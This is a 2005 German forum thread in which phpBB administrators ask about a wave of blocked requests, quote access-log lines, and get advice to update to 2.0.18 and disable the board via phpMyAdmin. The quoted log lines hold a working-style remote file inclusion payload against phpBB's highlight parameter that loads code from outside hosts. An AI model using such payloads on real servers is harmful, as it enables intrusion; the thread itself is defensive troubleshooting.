Was für eine Attacke kann denn das ein?

[Wolfgang67]

Seit gestern hatte ich mehrere tausend Aufrufe die mit einer 403 abgewiesen wurden. Was geht da vor und was kann man dagegen tun?

Hier ein Auszug aus meinem Log:

Code: Alles auswählen

- [08/Nov/2005:00:02:16 +0100] "GET /viewtopic.php?t=605&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.dps-ct.com/home/customerupload/phpbb_patch?& HTTP/1.0" 403 288 "-" "Mozilla/4.0" "www.funkart-forum.de"
209.126.144.27 -

 - [08/Nov/2005:00:02:18 +0100] "GET /viewtopic.php?p=4181&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.austria101.server4free.de/phpbb_patch?& HTTP/1.0" 403 288 "-" "Mozilla/4.0" "www.funkart-forum.de"
207.226.22.176 - 

Adresse des Forums ist www.funkart-forum.de


Gruß Wolfgang

[hintzsche]

was ich bis jetzt herausgefunden habe ist das mozilla/4.0 ein Opera 6 browser getarnt als msie5 ist benutzt du eine css weiche?

[Wolfgang67]

Da ich keine Ahnung habe was eine CSS Weiche ist, nehme ich mal an, dass ich keine benutze.

Ich hab gehosteten Webspace bei hosteurope, keinen eigenen Server.

Nutzt es, wenn ich eine größere Portion aus meinem Log hier einstelle?

[itebob]

Hallo,

Seit gestern hatte ich mehrere tausend Aufrufe die mit einer 403 abgewiesen wurden.

Habe ich auch tausend Aufrufe mit dem gleichen Datum entdeckt. Hast du inzwischen mehr in Erfahrung gebracht? Ich habe den Ärger, dass sich in meinem Forum etliche Spammitglieder eingenistet haben. Und da ich die gleiche Probleme, wie im Thread Admin Zugang; auf einmal nicht möglich! beschrieben, habe, kann ich diese Mitglieder nicht einmal löschen Vielleicht gibt es einen Zusammenhang zwischen dieser Attacke und den Spammmitgliedern?

[IPB_Flüchtling]

Ist ein Versuch, eine ehemalige Sicherheitslücke von phpbb auszunutzen. Wenn Ihr nach highlight 2527 sucht, findet Ihr z.B. diesen Thread.

Wenn Ihr 2.0.18 habt, seid Ihr auf der sicheren Seite. Zusätzlich sollte der CrackerTracker (Link in meiner Signatur) installiert sein.

LG, IPB_Flüchtling

[itebob]

@IPB_Flüchtling
> Ist ein Versuch, eine ehemalige Sicherheitslücke von phpbb auszunutzen.
Sieht so aus, dass der Versuch erfolgreich war - ich kann mich als Admin nicht einloggen . Gibt es allgemeingültige Empfehlungen, was ein Admin zu machen hat, bevor man auf 2.0.18 updated? Oder ist mit dem Update ein Einloggen automatisch möglich?

[IPB_Flüchtling]

Hast Du wirklich noch ein 2.0.4, wie in der Signatur steht? Dann würde ich tatsächlich dringend empfehlen, upzudaten!

Geht auch ganz leicht:

1. Board deaktivieren.
2. Alle Dateien außer der config.php durch die entsprechenden 2.0.18-Dateien ersetzen.
3. Die Datei update_to_latest.php ausführen, um die Datenbank auf den neuesten Stand zu bringen.
4. Board wieder aktivieren.

Alle Mods müssen dann halt neu eingebaut werden. Das geht aber viel schneller, als von 2.0.4 auf 2.0.18 manuell upzudaten.

Wenn Du wirklich gecrackt worden bist, solltest Du Dir den ersten Link in meiner Signatur näher ansehen.

LG, IPB_Flüchtling

[itebob]

> 1. Board deaktivieren.
...
> 4. Board wieder aktivieren.
wenn ich mich als Admin nicht anmelden kann, dann wird dies über MyAdmin-Oberfläche gemacht?

Danke für die hilfreiche Tips! Übrigens das vermutlich gecracktes Forum ist http://forum.selfcms.de

[IPB_Flüchtling]

Hallo itebob,

mach es über phpMyAdmin: http://www.phpbb.de/doku/kb/search.php? ... phpmyadmin

Du brauchst dann nur im Feld phpbb_config in der Zeile board_disable den Wert von 0 auf 1 setzen.

LG, IPB_Flüchtling